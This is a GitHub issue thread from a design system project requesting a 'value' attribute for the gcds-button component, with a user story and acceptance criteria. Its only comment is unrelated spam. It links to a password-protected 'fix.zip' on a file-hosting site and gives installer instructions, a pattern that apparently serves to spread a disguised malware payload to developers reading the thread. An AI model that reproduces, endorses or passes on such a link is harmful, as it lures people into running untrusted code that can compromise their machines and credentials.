### ISSUE TITLE
Add `value` attribute to `gcds-button`

### ISSUE THREAD

**Issue by alexadavidson** [cds-snc/design-gc-conception#1109]
**Summary:** 
Development of the GC DS button component to include the 'value' attribute -- as raised in support [ticket 18830](https://cds-snc.freshdesk.com/a/tickets/18830)

## 📇 User story
- As a developer who uses the design system, I want to have a value attribute on the button component, so that I can track user behavior

## ✅ Definition of Done / Outcomes
Done when button component is published with a value attribute

## 📜 Acceptance criteria
_Add here the list of assumed steps that will be needed to complete the task_
- [x] Storybook updated
- [x] Tests added and passing

## 📝 More info
- Raised by Openplus team building GC Drupal

**. 🚫 Out of scope**
Other components
Would this attribute be valuable in other components? No, this is specific to the button component.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
